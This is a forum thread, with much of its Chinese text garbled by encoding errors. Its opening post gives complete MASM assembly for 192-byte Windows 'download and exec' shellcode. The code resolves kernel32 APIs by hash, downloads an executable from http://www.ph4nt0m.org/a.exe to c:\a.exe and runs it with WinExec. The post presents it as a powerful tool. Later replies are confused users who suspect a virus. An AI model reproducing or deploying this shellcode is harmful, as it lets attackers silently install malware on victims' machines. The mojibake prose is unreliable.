ÔÚÏßÇé¿ö
Â¥Ö÷
  • Í·Ïñ
  • ¼¶±ð
    • »ý·Ö47
    • ¾­Ñé157
    • ÎÄÕÂ36
    • ×¢²á2008-05-17
    win32 Tiny Download and Exec Shellcode 192 bytes
    ²»ÊÇÀÏÓÐÈËÂôÏÂÔØÕßµÄÂð£¿ÆäʵËûÃÇÂôµÄ¶«Î÷δ±ØÊÇ×Ô¼ºÐ´µÄ¡£Ö»²»¹ýÊÇ´ó¼Ò×Ô¼ºÃ»ÓÐ×ÐϸÑо¿¶øÒÑ¡£·¢Ò»¸ö¾ÞСµÄºÃ¶«Î÷£¬ÖÁÉÙÎÒÏÖÔÚ»¹Ã»Óз¢ÏÖ¹úÄÚÄÄÀïÓеġ£07Äê6Ô·ݾͳöÀ´ÁË¡£ÎÒÖ®ËùÒÔ·¢³öÀ´ÊÇÒòΪËüɱÉËÁ¦´ó£¬ºÜ¾­µäºÜÓÐÓ㬾ӼÒÂÃÐÐɱÈË·Å»ðµÄºÃ¹¤¾ß°¡¡£²»ËµÁË£¬¿´´úÂë¡£ÓÐÐËȤµÄ×Ô¼º±àÒëһϡ£
    ;Tiny Download&&Exec ShellCode codz czy
    ;header 163=61(16+8+9+(28))+95(68+27)+17
    ;163+19=192
    comment %
    system :test on ie6+XPSP2/2003SP2/2kSP4
    %
    .586
    .model flat,stdcall
    option casemap:none

    include     c:\masm32\include\windows.inc
    include     c:\masm32\include\kernel32.inc
    includelib  c:\masm32\lib\kernel32.lib
    include     c:\masm32\include\user32.inc
    includelib  c:\masm32\lib\user32.lib


    .data
    shelldatabuffer db 1024 dup(0)
    shellcodebuffer    db 2046 dup(0)
    downshell    db 'down exploit',0
    .code
    start:
        invoke    MessageBoxA,0,offset downshell,offset downshell,1
        invoke    RtlMoveMemory,offset shellcodebuffer,00401040H,256
        mov    eax,offset shellcodebuffer
        jmp    eax
        somenops db 90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h
    ;áëà ÃæµÄ´úÂëÊÇ¡ãá®Ã¡±ÃšÂ´ÃºÃ‚ë¶ÎèCà µÄshellcodeá¯Ã†Â¶Â¯ÃŠÃ½Â¾Ã ¶ÎèCà èC´à à £¬Ä£ÄâÕæʵµÄshellcodeèC´à à »¡¤Â¾Â³    
    @@shellcodebegin:       
        call    @@beginaddr
    @@beginaddr:
        PUSH 03H      ;á¯ÂªÂµÃ¡¤Ã¡°ÃƒÂµÃ„APIº¯Êý¸öÊý
        jmp    @@realshellcode          
    myExitProcess     dd 073e2d87eh  
    myWinExec         dd 00e8afe98h    
    myLoadLibraryA    dd 0ec0e4e8eh
    dll               db 'URLMON',0,0
    myUrlDownFile     dd 0702f1a36h
    path              db 'c:\a.exe',0
    url               db '[URL=http://www.ph4nt0m.org/a.exe][U][COLOR=#0000ff]http://www.ph4nt0m.org/a.exe[/COLOR][/U][/URL]',0



    @@realshellcode:
        POP ECX
        POP EDI
        SCASD ;edi+4
    ;µÃµ½kernel32.dll»ùµØèC¡¤
    db  67h,64h,0A1h,30h,00h
        mov eax, [eax+0cH]
        mov esi, [eax+1cH]
        lodsd
        mov ebp, [eax+08H]          ;EBPèCà ´æ¡¤Ã¡­kernel32.dllµÄ»ùµØèC¡¤
    ;´¦Àíµ¼³ö¡Àí
    @@next2:
    PUSH      ECX
    @@next3:
    MOV       ESI,[EBP+3Ch]
    MOV       ESI,[EBP+ESI+78h]
    ADD       ESI,EBP
    PUSH      ESI
    MOV       ESI,[ESI+20h]
    ADD       ESI,EBP
    XOR       ECX,ECX
    DEC       ECX
    @@next:
    INC       ECX
    LODSD
    ADD       EAX,EBP
    XOR       EBX,EBX
    @@again:
        MOVSX     EDX,BYTE PTR [EAX]
        CMP       DL,DH
        JZ        @@end
        ROR       EBX,0Dh
        ADD       EBX,EDX
        INC       EAX
        JMP       @@again
    @@end:
    CMP       EBX,[EDI]
    JNZ       @@next

    POP       ESI
    MOV       EBX,[ESI+24h]
    ADD       EBX,EBP
    MOV       CX,WORD PTR [ECX*2+EBX]
    MOV       EBX,[ESI+1Ch]
    ADD       EBX,EBP
    MOV       EAX,[ECX*4+EBX]
    ADD       EAX,EBP
    STOSD
    POP       ECX
    loop @@next2

    mov ecx,[edi]   ;2
    cmp cl,'c'      ;3
    jz @@downfile   ;2
    PUSH EDI
    CALL EAX        ;2
    xchg eax,ebp
    scasd
    scasd
    push 01         ;2µÚ¶þ¸öDLLµÄº¯Êý¸öÊý
    jmp @@next3     ;2
                    ;áªÃœÂ¼Ã†17

            
    @@downfile:

        push    edx  ;0
        push    edx  ;0
        push    edi  ;file=c:\a.exe
        lea     ecx, dword ptr [edi+9h]
        push    ecx  ;url
        push    edx  ;0
        call    eax  ;URLDownloadToFileA,0,url,file=c:\a.exe,0,0
       
       
        push 1 ;FOR TEST
        push edi
        call dword ptr [edi-14H] ;winexec,'c:\xxx.exe',1
       
        call dword ptr [edi-18H] ;Exitprocess

        somenops2 db 90h,90h,90h,90h,90h,90h,90h,90h,90h
        invoke ExitProcess,0
    end start
    żµÄblog£ºwww.dasek.cnÇ×ÃÇÓÐʱ¼äµÄ»°È¥²È²È£¬Ò»Æð½»Á÷£º£©
    ÔÚÏßÇé¿ö
    2Â¥
    • Í·Ïñ
    • ¼¶±ð
      • »áÔ±ÈÏÖ¤»áÔ±
      • ÉùÍû£«6
      • ²Æ¸»1
      • »ý·Ö3225
      • ¾­Ñé140062
      • ÎÄÕÂ3690
      • ×¢²á2007-10-26
      ÄãÊÇ×Öĸר¼ÒÂð£¿
      ³ÏÐÅ×öÈË   ̤ʵ×öÊÂ
      ÔÚÏßÇé¿ö
      3Â¥
      • Í·Ïñ
      • ¼¶±ð
      • »ÕÕÂ
      • »áÔ±ÈÏÖ¤»áÔ±
      • ÉùÍû£«3
      • »ý·Ö866
      • ¾­Ñé57953
      • ÎÄÕÂ1122
      • ×¢²á2008-02-15
      [FACE=¿¬Ìå_GB2312 ][COLOR=#dddd22][SIZE=5]¿´À´ÔÛÃÇÏܵÂ×ÚÇ׸ú¡°»ùµØ×éÖ¯±¾À­¶¡¡±½ÓÉÏÍ·ÁËÓÐʲô»õ?չʾÏÂÈÃ×ÚÇ×ÃǶ¼¼ûʶһÏÂ,¿ª¿ªÑÛ½ç.[/SIZE][/COLOR][/FACE]
      ÁúɽÅɶþ¶þÊÀÔ¥¹«ÊùÕòÁúÑÒËùÄÚ·»Èý´«ÁúÑÒÎ÷ÚéÅÅͷȪÌĹ«£¨»äµÂ´æ£©Ê®Îå´úÒáËï.Îä³ÇÅÉÆßÊ®ÎåÅÉ¡¢ÁúɽÅÉËÄÊ®´ú¡¢[GLOW=255,RED,2]µã»÷½øÈ룺[URL=http://blog.sina.com.cn/u/1898710184]ÀÏÑòµÄ²©¿Í[/URL][/GLOW]
      ÔÚÏßÇé¿ö
      4Â¥
      • Í·Ïñ
      • åÐÒ£×ÔÔÚ
      • ¼¶±ð
        • »áÔ±ÈÏÖ¤»áÔ±
        • ²Æ¸»1
        • »ý·Ö1311
        • ¾­Ñé134885
        • ÎÄÕÂ1842
        • ×¢²á2007-04-21
        ¿´²»Ã÷¡£

        Óдý½âÂë
        ÔøÊÏ×ÚÇ×Íø¸ÐлÄúµÄ²ÎÓë
        ÔÚÏßÇé¿ö
        5Â¥
        • Í·Ïñ
        • ¼¶±ð
          • »ý·Ö3
          • ¾­Ñé151
          • ÎÄÕÂ4
          • ×¢²á2008-05-20
          ÎÒÔ½¿´Ô½ÉµÁË,¸Ã²»»áÊDz¡¶¾³ÌÐò°É,Õâ¸ö±à³ÌÕßҲ̫»á¶à¹úÓïÑÔÁË
          ÔøÊÏ×ÚÇ×Íø¸ÐлÄúµÄ²ÎÓë
          ÔÚÏßÇé¿ö
          6Â¥
          • Í·Ïñ
          • ¼¶±ð
            • Ö°ÎñÂÛ̳°æÖ÷
            • ÉùÍû£«9
            • ²Æ¸»1
            • »ý·Ö2199
            • ¾­Ñé84395
            • ÎÄÕÂ2392
            • ×¢²á2006-09-30
            ʲô¶«¶«£¬²»¶®[EM21][EM21][EM10][EM10]
            ÌìÏÂÔøÊÏÊÇÒ»¼Ò  ÎÒ°®ÎÒ¼Ò       ÔøÊϵڶþ·¢ÏéµØ½­Î÷Ê¡ÀÖ°²ÏØÍûÏÉÀï  ÆßÊ®ËÄÅÉ ÏÜ×Ö±²  QQ:499818403
            Powered by LeadBBS 9.2 licence.
            Page created in 0.0312 seconds with 6 queries.